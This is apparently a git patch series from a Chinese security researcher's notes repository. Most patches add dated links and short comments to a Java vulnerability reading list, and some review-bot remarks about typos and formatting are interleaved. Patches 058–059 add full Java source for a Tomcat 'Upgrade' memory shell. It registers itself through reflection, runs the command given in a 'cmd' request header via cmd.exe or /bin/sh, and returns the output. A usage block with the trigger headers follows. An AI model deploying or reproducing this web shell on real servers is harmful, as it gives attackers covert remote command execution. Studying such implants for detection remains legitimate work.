b/shell/SPEL/Readme.md @@ -111,7 +111,8 @@ print(')}') 其他bypass: https://xz.aliyun.com/t/9245 ## 参考 - +> https://xz.aliyun.com/t/9245 **可以使用#request.getRequestedSessionId() 或者 #request.getHeader('User-Agent') 反正可以使用request对象或者respose** +> >https://www.cnblogs.com/bitterz/p/15206255.html > >https://landgrey.me/blog/15/ From c337e11d2e0c3cb385652b8ee7fc35aefe7916af Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:50:14 +0800 Subject: [PATCH 041/257] Create jetty --- jetty | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 jetty 
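Review bot: In the 040 hunk under `## 参考`, the added line misspells the response object as `respose`, and its URL https://xz.aliyun.com/t/9245 is the same one already given on the `其他bypass:` context line directly above the heading. Fix the spelling and keep the link in one place, moving the bold remark with it. The added line also mixes `> ` with the existing `>` style of the quoted links below it; pick one.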
diff --git a/jetty b/jetty new file mode 100644 index 0000000..aefe916 --- /dev/null +++ b/jetty @@ -0,0 +1,5 @@ +# jetty + +比较好的文章 + +https://swarm.ptsecurity.com/tag/web-application-security/ From d160b9a1e472c722fb846f0c600ad772c9127601 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:50:54 +0800 Subject: [PATCH 042/257] Delete jetty --- jetty | 5 ----- 1 file changed, 5 deletions(-) delete mode 100644 jetty diff --git a/jetty b/jetty deleted file mode 100644 index aefe916..0000000 --- a/jetty +++ /dev/null @@ -1,5 +0,0 @@ -# jetty - -比较好的文章 - -https://swarm.ptsecurity.com/tag/web-application-security/ From cca34aa995753884be80e17f29e1c4cabec07f9d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:51:25 +0800 Subject: [PATCH 043/257] Create Readme.md --- Jetty/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 Jetty/Readme.md diff --git a/Jetty/Readme.md b/Jetty/Readme.md new file mode 100644 index 0000000..c036d30 --- /dev/null +++ b/Jetty/Readme.md @@ -0,0 +1,5 @@ +# Jetty + +好文章: + +https://swarm.ptsecurity.com/tag/web-application-security/ From cb7c7d5c7e9159c1e4979bb589bd9df5447430b3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 21:11:04 +0800 Subject: [PATCH 044/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 28e3f61..2243d30 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -155,4 +155,5 @@ + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** + 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** + 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** -+ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) ++ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) ++ 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** From 312f9323aa901d1543bd57e43078170e44420cf0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Sep 2022 23:36:50 +0800 Subject: [PATCH 045/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2243d30..add100f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -157,3 +157,4 @@ + 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** + 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) + 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** ++ 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) From 48ee10b76006bf6a2d01b6ab7242525ed0d92933 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 19 Sep 2022 00:21:26 +0800 Subject: [PATCH 046/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index add100f..6ac687a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -158,3 +158,4 @@ + 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) + 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** + 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) ++ 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) From 5e790ec8cb65a3cae8b3bdfc0f2c3ca05355558f Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 20 Sep 2022 21:14:05 +0800 Subject: [PATCH 047/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6ac687a..25d842d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -159,3 +159,4 @@ + 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** + 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) + 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) ++ 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** From bf60900e50187054bbc1e75c4a7cfd49a3d84dcf Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Sep 2022 14:49:19 +0800 Subject: [PATCH 048/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 25d842d..0b18a57 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -160,3 +160,4 @@ + 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) + 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) + 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** ++ 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** From 69cdaa189e2a401161c90c2efedf7332f94063fe Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Sep 2022 23:55:38 +0800 Subject: [PATCH 049/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0b18a57..7c01619 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -161,3 +161,4 @@ + 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) + 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** + 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** ++ 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** From 92683e32d154813cc5b117fd4e73d8533c292f82 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Sep 2022 13:22:52 +0800 Subject: [PATCH 050/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7c01619..4b5decd 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -162,3 +162,4 @@ + 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** + 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** + 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** ++ 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** From 7bcef03b26b097d9127ca1c30aad7bcb92ea5f2d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Sep 2022 21:43:07 +0800 Subject: [PATCH 051/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4b5decd..0472cfa 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -163,3 +163,4 @@ + 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** + 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** + 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** ++ 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** From 4e56cffcd809587ee0af6bef615538f7ae9c04ea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Sep 2022 21:52:27 +0800 Subject: [PATCH 052/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0472cfa..83b5ca2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -164,3 +164,4 @@ + 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** + 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** + 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** ++ 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** From e0008a4e09a2b796f8e8a80c8cc61e0a63743879 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 29 Sep 2022 14:24:29 +0800 Subject: [PATCH 053/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 83b5ca2..bfcb129 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -165,3 +165,4 @@ + 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** + 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** + 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** ++ 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) From f68e12bfebc19e66aa810baddf4b01c788f00334 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 29 Sep 2022 16:43:40 +0800 Subject: [PATCH 054/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bfcb129..2bec876 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -166,3 +166,4 @@ + 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** + 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** + 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) ++ 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** From df9e765c02fd05924778fa091965a139e8dfa2d6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 4 Oct 2022 18:18:28 +0800 Subject: [PATCH 055/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2bec876..61e5771 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
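Review bot: In the `java日常/Readme.md` hunk of PATCH 054, the added entry is dated `2022/9/29`, while the neighbouring entries use zero-padded months (`2022/09/29`, `2022/09/26`). Write it as `2022/09/29` so the list stays sortable and searchable by date.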
@@ -167,3 +167,4 @@ + 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** + 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) + 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** ++ 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** From f22f680cf2aee58989104c6b2d2c4615e6475e21 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 17:10:29 +0800 Subject: [PATCH 056/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 61e5771..50449d7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -168,3 +168,4 @@ + 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) + 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** + 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** ++ 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) From f4571ad0e360dbe2657a9d39c03b011de1313307 Mon Sep 17 00:00:00 2001 
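Review bot: In the entry PATCH 055 adds to `java日常/Readme.md`, the annotation contains a typo, `破环性语句`, which should read `破坏性语句`. The sample input is also written with typographic quotes (`or ‘1=1’`); use ASCII quotes so the example matches what a database would actually receive.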
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 19:58:43 +0800 Subject: [PATCH 057/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 50449d7..b7a23e1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -169,3 +169,4 @@ + 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** + 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** + 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) ++ 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) From 351c10a9c59825a0a8150200a6a45494546e42d4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 21:23:33 +0800 Subject: [PATCH 058/257] Create Readme.md --- .../Upgrade/Readme.md" | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 "java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" diff --git "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" new file mode 100644 index 0000000..66f26f0 --- /dev/null +++ "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" 
@@ -0,0 +1,92 @@ +# Upgrade + +参考:https://tttang.com/archive/1709 + +```java +package com.example.demo; + + +import org.apache.catalina.connector.Connector; +import org.apache.catalina.connector.Request; +import org.apache.catalina.connector.RequestFacade; +import org.apache.coyote.Adapter; +import org.apache.coyote.Processor; +import org.apache.coyote.Response; +import org.apache.coyote.UpgradeProtocol; +import org.apache.coyote.http11.AbstractHttp11Protocol; +import org.apache.coyote.http11.upgrade.InternalHttpUpgradeHandler; +import org.apache.tomcat.util.net.SocketWrapperBase; +import org.springframework.web.context.request.RequestContextHolder; +import org.springframework.web.context.request.ServletRequestAttributes; + +import javax.servlet.http.HttpServletRequest; +import java.lang.reflect.Field; +import java.nio.ByteBuffer; +import java.util.HashMap; + +public class UpgradeMemShell implements UpgradeProtocol { + + public UpgradeMemShell() throws Exception{ + HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest(); + RequestFacade rf = (RequestFacade) request; + Field requestField = RequestFacade.class.getDeclaredField("request"); + requestField.setAccessible(true); + Request request1 = (Request) requestField.get(rf); + + Field connector = Request.class.getDeclaredField("connector"); + connector.setAccessible(true); + Connector realConnector = (Connector) connector.get(request1); + + Field protocolHandlerField = Connector.class.getDeclaredField("protocolHandler"); + protocolHandlerField.setAccessible(true); + AbstractHttp11Protocol handler = (AbstractHttp11Protocol) protocolHandlerField.get(realConnector); + + HashMap upgradeProtocols = null; + Field upgradeProtocolsField = AbstractHttp11Protocol.class.getDeclaredField("httpUpgradeProtocols"); + upgradeProtocolsField.setAccessible(true); + upgradeProtocols = (HashMap) upgradeProtocolsField.get(handler); + upgradeProtocols.put("http2.0", this); + 
upgradeProtocolsField.set(handler, upgradeProtocols); + System.out.println("success"); + } + + @Override + public String getHttpUpgradeName(boolean b) { + return null; + } + + @Override + public byte[] getAlpnIdentifier() { + return new byte[0]; + } + + @Override + public String getAlpnName() { + return null; + } + + @Override + public Processor getProcessor(SocketWrapperBase socketWrapperBase, Adapter adapter) { + return null; + } + + @Override + public InternalHttpUpgradeHandler getInternalUpgradeHandler(Adapter adapter, org.apache.coyote.Request request) { + return null; + } + + public boolean accept(org.apache.coyote.Request request) { + System.out.println("MyUpgrade.accept"); + String p = request.getHeader("cmd"); + try { + String[] cmd = System.getProperty("os.name").toLowerCase().contains("windows") ? new String[]{"cmd.exe", "/c", p} : new String[]{"/bin/sh", "-c", p}; + Field response = org.apache.coyote.Request.class.getDeclaredField("response"); + response.setAccessible(true); + Response resp = (Response) response.get(request); + byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes(); + resp.doWrite(ByteBuffer.wrap(result)); + } catch (Exception e){} + return false; + } +} +``` From c5700834536524367770e550cb8302226bd601e0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 21:24:47 +0800 Subject: [PATCH 059/257] Update Readme.md --- .../Upgrade/Readme.md" | 7 +++++++ 1 file changed, 7 insertions(+) diff --git "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" index 66f26f0..596af80 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" 
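Review bot: The new `java内存马/Upgrade/Readme.md` in PATCH 058 is a reference link plus code, with nothing on the Tomcat version it was tested against or on how to find the entry afterwards. The constructor depends on four private field names (`request`, `connector`, `protocolHandler`, `httpUpgradeProtocols`) that are not a stable API, and the only change it makes is the extra key in the connector's `httpUpgradeProtocols` map, which lives only in the running process. Add a short section stating the tested version and noting that auditing that map for unexpected `UpgradeProtocol` implementations is the check, so the note is usable for detection work as well.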
@@ -90,3 +90,10 @@ public class UpgradeMemShell implements UpgradeProtocol { } } ``` + +使用 +```txt +Upgrade: http2.o +cmd: calc +Connection: Upgrade +``` From 7f0fb3b6b052194022eeb6ce759e6a25b37de401 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 09:22:54 +0800 Subject: [PATCH 060/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b7a23e1..b8bc2c3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -170,3 +170,4 @@ + 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** + 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) + 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) ++ 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) From 7c2cd304788cb83e904b43ab71b57d177b0636a7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 15:57:15 +0800 Subject: [PATCH 061/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b8bc2c3..3625db3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -171,3 +171,4 @@ + 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) + 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) + 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) ++ 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) From 949c1f10328121fdd98f47914c38b567b483bc38 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 19:26:24 +0800 Subject: [PATCH 062/257] Create Readme.md --- Jdk/Readme.md | 65 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 Jdk/Readme.md diff 